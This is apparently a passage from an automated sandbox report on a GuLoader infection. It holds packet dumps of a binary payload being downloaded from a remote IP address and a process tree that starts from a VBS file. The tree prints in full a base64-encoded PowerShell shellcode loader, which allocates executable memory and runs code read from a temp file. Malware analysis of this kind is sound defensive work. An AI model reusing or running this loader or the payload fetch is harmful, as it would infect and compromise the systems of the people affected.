Nov 25, 2021 11:28:10.247426987 CET	341	IN	Data Raw: ff 10 a3 f5 5a 1e 35 90 49 37 60 d8 11 48 1a e0 87 01 34 74 b2 ad 30 eb a3 96 86 59 b1 9c 9b e0 b6 3a fd cd e8 66 7c 61 62 9b 39 de 30 7b 77 de 14 c9 0e 86 56 47 ec 46 ab 7a ab ba 60 c5 77 4d 2f 31 b4 74 b4 71 d0 9f 9a da 1a bf 6c 03 db 55 38 5a Data Ascii: Z5I7`H4t0Y:f\|ab90{wVGFz`wM/1tqlU8Z`sDi65LrXp!evw&lkx<(6Y<r OLH^:vc,?B!whMf\?kmAS$J#)

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49810	103.167.84.150	80	C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 11:28:24.364823103 CET	1330	OUT	GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 103.167.84.150 Cache-Control: no-cache
Nov 25, 2021 11:28:24.649498940 CET	1360	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 10:28:28 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31 Last-Modified: Wed, 24 Nov 2021 18:27:10 GMT ETag: "28240-5d18d018cabcd" Accept-Ranges: bytes Content-Length: 164416 Content-Type: application/octet-stream Data Raw: 1a 28 20 db 91 2c bd f8 80 63 77 bc 30 a9 80 ac 09 32 33 ca 09 63 a2 54 21 de 48 da cf e2 f2 05 93 65 62 53 77 60 ea 6b 8a bf c6 af ac 70 3b 7d fe 4b 16 a3 4b e0 34 b2 cb c9 ff 2b 0c e3 8f 99 93 1a a8 2d 3f 62 4f d3 db 42 33 01 54 fe 12 ed 99 19 5c 08 5c 2b b2 9e 0b 1b 51 d9 09 6a 58 1b 16 2c b8 c9 50 a6 87 32 4a 70 bb b6 0e 59 a0 88 f1 39 ff e8 ba b3 cf bb b0 2b 81 84 0c e8 96 46 6d d3 4b 13 5e a5 79 8e ab 83 e9 46 1f 84 e7 1c be c4 50 68 42 33 3c 1a 90 40 49 44 e6 0d 41 12 32 9b e2 7a 43 41 a3 29 37 39 d9 33 df 5a 12 53 22 a7 36 e1 01 a3 77 83 06 5d 65 58 11 a7 dd 24 67 67 03 c5 f1 8f a9 f7 0f 73 a9 9b b9 06 69 8a db 23 2f a8 1e 50 b2 a7 fb 3f 7f 61 89 1b 1d 85 94 2d b8 59 af c5 de 61 e5 e7 2d de 4c 44 d9 7e 0a f5 10 a9 75 da d3 d7 f3 de e7 04 50 74 a7 f9 ee 4f 41 a8 47 7c dd 52 66 f9 61 e9 e3 e3 2d eb 11 5a 17 25 7c 83 b1 f5 72 05 7c f2 3c bb 86 a6 e0 5e 44 32 55 90 d5 8d 20 38 c5 b7 be f2 ff db 5f b0 0b dc 4e c4 0e b4 12 53 3d 8b 8b c5 59 c9 fb 41 97 c5 07 bf c7 1f c5 74 0c 8e 07 f4 d3 e1 01 3a 78 d3 73 cd 25 fa 1c 05 08 75 0c 25 41 2e cd d6 8c 72 63 30 cb b6 51 d4 1e b9 d4 7c 4d d4 03 dc fe fb a3 4f 63 d4 46 72 eb 63 8a 91 25 06 c3 cf a2 12 77 4f 3b 6d 60 42 1c 30 2f 0d 44 75 69 fd 29 2d 4c 74 63 13 4d f6 db 18 f0 a7 db 88 31 85 da 9e 45 c5 9b 8a 51 87 30 19 cc c5 18 95 7c 1d 8e 26 e3 e0 41 a8 25 57 ca c7 1b 87 d1 f9 ba e7 dc 76 11 2c 12 4d ce d9 52 59 6f 7e 58 c3 e5 41 b0 bc 0b 5e 3d ba e6 17 11 12 a4 22 e3 46 96 69 1e 79 70 ba 76 5c b5 38 46 c4 5c ff 92 d6 94 80 2b 8d 08 92 b8 1e 33 0b 30 d8 a2 36 00 c1 aa 4e a0 c3 e1 2d 28 62 0b 24 39 31 b8 54 8e 1f 4d 31 38 9a 7f 01 2f 13 28 15 86 3f 54 70 1e 9c 0f db aa 3b 65 e0 55 13 f0 85 31 6b 3a b6 df 6c 30 03 ed 44 ab 8f 6b ff 0a 5a ac 54 3d 2e 84 7b 53 bc 32 1b df 46 62 41 c4 c3 67 f1 65 88 28 0c 38 e8 4a 62 d5 38 97 a0 6d c7 f8 38 c0 69 42 8e f4 2c 6d a1 bb cf dc b4 cb bb 9f 66 b1 69 52 c4 5b 4b 7f fb 79 00 3d 03 f3 93 e7 d1 32 1a 8c d2 8c 8a 81 62 11 6b 97 9c 4b 1b 05 b4 0b ae 33 eb a3 3f 85 59 b1 fc 6a 4a 3b 7e d9 c4 61 bf 55 bc ef c7 1d d2 f9 bc ce c4 13 50 98 4e d1 75 12 b9 f8 3a 28 47 9f 91 73 8b 6b 14 b0 49 5f f6 59 db be d6 91 f3 48 2b 52 54 bb 9e 70 28 dc 1b 04 47 bd 6e 83 fb b9 cb bd a0 a6 8b 2d 6c 0b 37 bb 4f 27 5c 24 ff 94 85 a9 25 90 14 20 45 aa 82 fd 03 f0 38 e6 5d fb ff a0 5b 31 6f d8 c5 82 ee 1f 84 69 6c e4 e8 87 3b 18 bb 8c 49 01 4f 54 3c 72 28 b6 dd 05 b1 df e9 05 44 d0 0d 69 81 43 d5 45 50 88 fb b9 75 90 a8 57 c7 ac 6c 42 b1 22 9b 43 7e dc 9a e9 c2 3a ff 32 76 9d 2e f3 19 d0 68 ad 37 1b 9c 31 43 a9 31 66 fe e1 8f 20 e3 36 b4 35 b7 a0 7b 43 6f f1 56 9a d9 bf 06 39 9e 09 9e c9 b8 90 09 4b 0e e2 16 3e 51 ab e2 24 ca b7 e6 e4 f0 4a d7 3a d8 3e ff c6 2a d6 ee 12 26 25 9d d5 5a 7e e5 02 cb 69 24 c5 c5 73 43 f2 a3 9b 3b 43 a0 18 69 b3 e4 ec d0 2b 7e 99 90 2b 77 66 54 60 e7 98 49 d2 39 1b f1 84 2b d8 6f 59 54 83 38 8d 07 21 ed ea 2b 87 43 3a 50 6c 21 8a de 40 38 2d 3c 62 4f d3 df 42 33 01 ab 01 12 ed 21 19 5c 08 5c 2b b2 9e 4b 1b 51 d9 09 6a 58 1b 16 2c b8 c9 50 a6 87 32 4a 70 bb b6 0e 59 a0 88 f1 39 ff e8 ba b3 cf bb b0 2b 81 84 8c e8 96 46 63 cc f1 1d 5e 11 70 43 8a 3b e8 0a d2 a5 b3 74 d7 b7 70 18 30 5c 5b 68 f1 2d 69 27 87 63 2f 7d 46 bb 80 1f 63 33 d6 47 17 50 b7 13 9b Data Ascii: ( ,cw023cT!HebSw`kp;}KK4+-?bOB3T\\+QjX,P2JpY9+FmK^yFPhB3<@IDA2zCA)793ZS"6w]eX$ggsi#/P?a-Ya-LD~uPtOAG\|Rfa-Z%\|r\|<^D2U 8_NS=YAt:xs%u%A.rc0Q\|MOcFrc%wO;m`B0/Dui)-LtcM1EQ0\|&A%Wv,MRYo~XA^="Fiypv\8F\+306N-(b$91TM18/(?Tp;eU1k:l0DkZT=.{S2FbAge(8Jb8m8iB,mfiR[Ky=2bkK3?YjJ;~aUPNu:(GskI_YH+RTp(Gn-l7O'\$% E8][1oil;IOT<r(DiCEPuWlB"C~:2v.h71C1f 65{CoV9K>Q$J:>*&%Z~i$sC;Ci+~+wfT`I9+oYT8!+C:Pl!@8-<bOB3!\\+KQjX,P2JpY9+Fc^pC;tp0\[h-i'c/}Fc3GP
Nov 25, 2021 11:28:24.649579048 CET	1361	IN	Data Raw: 15 41 73 4f c8 52 84 2f ae 7a 89 22 5d 65 58 11 a7 dd 24 37 22 03 c5 bd d8 fd c6 92 89 8f d1 7e 03 2d a2 99 23 d0 57 01 af 7b a0 d4 9e 99 3a 89 f5 70 a9 94 55 7f 5d 8b 0d 3c 23 c8 2b 4e f2 4c 54 52 4b da 60 50 a9 b2 df a3 64 b1 ce e7 04 50 76 60 Data Ascii: AsOR/z"]eX$7"~-#W{:pU]<#+NLTRK`PdPv`:F\|RMZ-j9XY&V~sD+J$m]1_Uh3fY\|6\'g%q!a%Q>M+NcFGy"F6Idr/@Qk-Hxq
Nov 25, 2021 11:28:24.649629116 CET	1362	IN	Data Raw: b1 37 50 e1 a8 ef b9 7f 5d 8d 3d 03 f3 e0 21 55 56 94 bc 92 a2 bf 23 87 41 85 97 9c a3 2d c3 30 2f 3e 30 eb a3 58 43 dd 95 0d 68 4a 3b 7e 1e c0 45 45 7c fe ef b9 5f 3a 7f 5d ff 04 b0 b6 d9 ee bc 16 12 30 10 13 24 ca 1b 95 bc 8b 6b 1a 77 0d 7b 86 Data Ascii: 7P]=!UV#A-0/>0XChJ;~EE\|_:]0$kw{_l?0)=S@5]$m-p]r4kE;mn<KT<\|UgAP<QG*C~]>2v=Y,;%B1 _kBot]\9
Nov 25, 2021 11:28:24.649674892 CET	1364	IN	Data Raw: b0 0f 56 a0 25 aa 7a 89 ca f6 b9 59 11 22 1d ad f1 2d 87 a9 b4 8e ae 77 32 0b 62 ca 2d 86 61 8e db 23 ac 6b fc 97 f8 80 e0 3a 7f 78 89 94 5b a1 98 92 fc 7d a7 ac de 61 c8 04 69 fa 48 53 d9 7e 0a 5c 0e 8d 9d 8c 9c d6 f3 43 61 00 52 76 a7 3e ae 6b Data Ascii: V%zY"-w2b-a#k:x[}aiHS~\CaRv>kQD\|&i-,UN"\|\|cn_d 9\8{^-BO\?](#H(B&Ehc%=X!t%AQ0X<ksGr)wO;$f7/DuBucX$]
Nov 25, 2021 11:28:24.933926105 CET	1435	IN	Data Raw: 4d 5f 6f 97 b8 5e 01 3d ea cf 97 e7 d1 fb 06 98 7a f2 cb e4 03 8c 25 93 9c a3 cf 01 90 17 a8 30 eb 4b 73 52 58 b1 19 a8 c3 fd 71 5d dd 65 bf 55 7b ab e3 0d d6 bb bc fe 8d 79 06 f1 af 02 32 c2 bd 54 37 ef 03 bb b9 71 8b 6b 1a 77 0d 7b 86 5c db be Data Ascii: M_o^=z%0KsRXq]eU{y2T7qkw{\lX^4z*ad7O%1]<K1;(;K%KS<r(?!YcD]aCw&sYs.2f.zedjs?5C1'6=fV@>
Nov 25, 2021 11:28:24.933993101 CET	1436	IN	Data Raw: c0 23 8e 7a 86 94 31 41 78 9a db f9 38 be 1e 27 4c d1 aa aa 1f 6e f5 9c 3a 3d c6 1c 93 1c 27 0b b8 d9 50 bc 4c 0b 67 7d 78 00 01 3b 6d 0c 61 b8 59 46 c8 21 9e 37 4e 69 fa 6d 1d 50 12 2e d1 9b e5 51 d6 1a eb d7 47 a3 20 58 ff eb dd f2 a7 10 43 b9 Data Ascii: #z1Ax8'Ln:='PLg}x;maYF!7NimP.QG XCVFajxN\|cO_ 7v^@d;Y/;xV-$v{IurDP~XIrkk]rV+%3k?K))Pg 12>
Nov 25, 2021 11:28:24.934041023 CET	1438	IN	Data Raw: f2 bf 5d 58 b4 47 d7 87 6c 92 7e 97 20 b6 7e e2 e5 03 ec 66 b3 90 64 4c 21 bc 0c 82 72 eb 64 6f a1 5d b5 9e 68 4a b2 62 fd 4d 25 9b 45 54 83 3a 1d d2 3c 7c 80 10 b4 66 d9 2a 33 52 36 f5 dd 6b 0c 43 16 b5 54 63 6f e0 b0 49 19 09 1f ff fa ed a1 fc Data Ascii: ]XGl~ ~fdL!rdo]hJbM%ET:<\|f3R6kCTcoID@00HC-lK'x0PuK!-H\IOT6.A`iC^tus/^Bg9bZ*<7w 5B& )gJ>T
Nov 25, 2021 11:28:24.934087992 CET	1439	IN	Data Raw: bb 64 32 52 d3 95 98 4f d2 92 3b af 03 03 ff 8e a1 41 a1 05 d5 e9 14 06 af c8 db 10 13 05 fe ee fe a4 c3 02 f0 78 4b 5f 1f 0c ee 51 33 12 a7 24 11 6e 7e 2a ec 31 54 5b 6f 52 a7 d5 d4 eb 75 d5 25 eb 4e ce 21 46 50 fd 9b 44 ea 9d 03 a8 75 40 70 52 Data Ascii: d2RO;AxK_Q3$n~*1T[oRu%N!FPDu@pRa`.">0OHUFxc=(t3V{NBL:GF0AQAY^FcL%5b5OQBr/>ym(Z+zSN
Nov 25, 2021 11:28:24.934134007 CET	1441	IN	Data Raw: 25 3d 03 f3 6c e8 67 a9 2b 74 a1 e5 ef 6e 17 f8 0a 51 de a3 83 59 90 0f 2f d2 eb a3 d4 85 56 07 43 59 9a b0 6a 44 c4 a7 fd 55 3d 0d c7 e2 d2 b9 8d 2e 8d ff aa bb 2d 7f fc 0a 31 02 3b a1 85 5e 5b 60 03 3d 17 39 8b 9e 68 53 53 e8 d8 12 37 50 70 0c Data Ascii: %=lg+tnQY/VCYjDU=.-1;^[`=9hSS7Pp]%H@yH78GHru%ta6Fpa!^4cR2<r(k]V!T!6]iMj":Ec88O)>Qt\|6(y7hK#&
Nov 25, 2021 11:28:24.934180975 CET	1442	IN	Data Raw: a2 65 58 11 d2 04 15 ec 13 d1 f4 7d bf 58 7a 01 0e ea 10 30 d1 ea 7d b8 a0 ce af 2d ad 34 65 23 c1 f0 30 8c 2c e2 0c 43 d6 59 5e 7c 52 53 29 ce f2 d0 57 9b d7 38 79 d9 2a 9f e1 72 eb 6e 5e 24 4d 06 03 83 89 2f 38 aa 7e bc 2b a3 7d 0e b7 6b 17 e2 Data Ascii: eX}Xz0}-4e#0,CY^\|RS)W8yrn^$M/8~+}kbe}~z^' LO^7Y"yRz]:Q0X$#rkbvc3'40I`qj)-\|<(,+Iau
Nov 25, 2021 11:28:24.934226990 CET	1443	IN	Data Raw: ff 10 a3 f5 5a 1e 35 90 49 37 60 d8 11 48 1a e0 87 01 34 74 b2 ad 30 eb a3 96 86 59 b1 9c 9b e0 b6 3a fd cd e8 66 7c 61 62 9b 39 de 30 7b 77 de 14 c9 0e 86 56 47 ec 46 ab 7a ab ba 60 c5 77 4d 2f 31 b4 74 b4 71 d0 9f 9a da 1a bf 6c 03 db 55 38 5a Data Ascii: Z5I7`H4t0Y:f\|ab90{wVGFz`wM/1tqlU8Z`sDi65LrXp!evw&lkx<(6Y<r OLH^:vc,?B!whMf\?kmAS$J#)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 5176 Parent PID: 4620

General

Start time:	11:25:30
Start date:	25/11/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\DETAILS.vbs"
Imagebase:	0x7ff705490000
File size:	170496 bytes
MD5 hash:	0639B0A6F69B3265C1E42227D650B7D1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 6584 Parent PID: 5176

General

Start time:	11:25:35
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjAG8AcgBwAG8AcgAgAHAAdQBsAGwAaQBjACAAUwBwAGkAbgBrAGUAdABjAGUAIABTAHAAYQByAHIAZQBoAHkAIABrAG8AbgB0AHIAYQBiACAAUwBWAEkATgBFAEEAVgBMAEUATgAgAGsAbwBuAHQAbwAgAFIAZQB2AGEAbABpAGQAZQBuAGQAMQAgAFMAZQBrAHUAbgAgAE0AeQBlAGwAIABDAGwAeQBzAHQAZQByAGkAegA0ACAAQQBsAGEAbABvAG4AZwBhAGEAZgAgAEEAcgBiAGkAdAByAGEAdABlADMAIABhAGYAdABlAG4AaABpACAAUwBUAEUAUgBJACAARQByAGsAbAA2ACAAQQBHAEwATwBTAFMAQQBMAEIARQAgAEEAbABtAGUAcgBpAGUAcwAzACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAFUAUgBFAEEAVQBLAFIAQQBUACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwAzAD0AMAA7AA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATwBwAGkAcwB0AGgAbwBjADMAOAA9AFsATwBwAGkAcwB0AGgAbwBjADMAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABPAHAAaQBzAHQAaABvAGMAMwAzACwAMAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBzAHQAagBtAGEAYQBsAGkAbgBnACAAZgBqAGUAcgBsAGUAdAAgAFQAdwBpAG4AcwAgAEIAQQBKAEEAUgBJAEcAIABOAGEAdAB1AHIAcAAgAEUAcgBzAGUAdQBuACAAcAByAG8AZwByAGEAIABDAGgAaQBuAGwAIABDAG8AbQBwAGkAMQAgAE0AZQBsAGwAZQBtAGsAIABVAG4AcwBjAGEAbABhADkAIABYAGUAbgBhAGMAYQA0ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AdABlACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA0AD0AWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBwAGkAcwB0AGgAbwBjADMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBQAGkAegB6AGwAZQBqAGEAIABkAGkAaABhAGwAbwBnACAARgBvAHIAZQBtAGEAcwB0AGgAYQA2ACAAUwB0AGUAZQBrAGsAYQBuAG4ANwAgAHAAdQBkAHMAIABVAE4ARABFAFIARwBSAFUATgBEACAATABlAGcAYQB0AGkAbwAgAEcAeQBwAHQAZQByAGUAbgBkAHIAOQAgAEcAcgBhAHQAYwBhAHIAaQBzAHMAIABzAHAAbwByAHQAcwB0AHIAYQBpACAAVABFAE8AUwAgAFMAaABpAHAAYgBvAHIAbgA3ACAATwBWAEUAUgBTAEkATAAgAEEAYQBzAGUAbgB0AGEAaQAgAE8AUABTAE8ATgBJAEYAIABTAHUAYwBjAGUAcwBzAGkAbwAxACAAdQBkAG0AYQB0AHQAZQAgAG8AawBzAGUAaABhAGwAZQByAGYAIABsAGUAdgBlAHIAIABTAGUAagBnAHIAdQBwAHAAZQA5ACAAUwBrAGEAYQBuADYAIABJAG4AcwB0AHIAdQBtAGUAbgAgAEMAdQB0AGwAYQA0ACAAQQBzAHQAcgBvAG4AYQB1AHQAMgAgAG0AaQBjAHIAbwBtAGkAbgBlAHIAIABCAEEATQBTAEkATQBQAEkAIABFAHgAdABlAG4AcwBvAHIAeQBjACAATwB2AGUAcgBiAGwAaQA2ACAARAByAGkAYgBsAGkAbgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBzAGUAbQBwAGwAYQA4ACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA1AD0AMAA7AA0ACgAjAFQASQBMAEwARQBNAFAARQBOACAAbABvAGcAbwBtACAAbgBpAGMAYQByACAAbgBvAG4AdQBzAGUAYQBwAHIAbwAgAHAAdQByAHAAbABlAGgAZQBhACAAUwBFAE0ASQBIAE8AQgBPAFQAIABkAGUAbABpAGcAaAAgAFAATwBPAFIASABPAFUAUwAgAEIAdQBkAGcANAAgAEUARABHAEUARABSACAARwBvAGwAawBhAGsAcgBhAGEAMQAgAEMAbwByAG4AZQBsAGkAcwBzAHAAIABSAEQARABFAFIATABJAEcARQBSACAAUwB5AG4AbwBuAHkAbQBlAHIAbgA0ACAAYwByAGUAYQB0AHUAcgBlAHMAIABDAG8AbQBpAG4AZgBvAHIAbQBpACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAE8AUwBUAFAAWQBSAEEATQBJACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATwBwAGkAcwB0AGgAbwBjADMANAAsACQATwBwAGkAcwB0AGgAbwBjADMAMwAsADQAOAAyADUAOAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADUALAAwACkADQAKACMARgBSAEEATgBDAEUAUwBDAE8ARQAgAG4AbwBuAHQAcgBhAG4AIABPAGIAcwBrACAAaQBuAGEAbABpAGUAIABGAG8AcgBlACAAVQBSAE4ARQAgAEwAbwBuAGcAZQBzAHQAIABDAGEAdABnAHUAdABzAGsAbwAgAFYAYQBsAGUAbgBzAGUAcgBzADUAIAB2AG8AbABvAG4AdAByAGUAIABKAG8AcgBkAGEAbgBpAGEAbgBhACAATQBlAHQAYQBwAGgAZwBlADgAIABHAEUATgBOAEUATQAgAGUAbgByAGEAcAB0ACAAVQBuAGkAbgB0ADEAIABVAHAAYQBhAHYAaQBzAGUAbAAzACAAVABJAFAATgAgAEIAYQBpAHIAbgBsAGkAZQByACAARABpAHMAcgAyACAAdAByAGEAYwBoAGUAbwBwACAATgBvAG4AYwBvAG4AdAAxACAATQBVAFMASwBJAFMASABCACAAVABSAFIARQBTAE4AIABQAFIARQBIAE8AUgBJACAAUwB0AHIAaQBrAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUATgBTAFEAVQBBACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABPAHAAaQBzAHQAaABvAGMAMwAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAGkAcwBlAGwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwByAGMAaABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAcABlAGoAZABlAG4AZAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEgARQBSAEUAVQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAHUAdABpAHoAMQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAEEAUgBFAFMAUwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzAGsAcgBrACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHQAZQBvAHMAbwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAG0AcwBrAGkAZgB0AGUAbAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAEUASQBaACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAYQBpAG4ANwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AZABlAHQAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAEEAUgBJAEYARgBJAFMAIgAgAA0ACgA=
Imagebase:	0xf70000
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.15295840627.0000000009B70000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 6640 Parent PID: 6584

General

Start time:	11:25:35
Start date:	25/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff675b50000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: csc.exe PID: 1528 Parent PID: 6584

General

Start time:	11:25:55
Start date:	25/11/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline
Imagebase:	0xdd0000
File size:	2141552 bytes
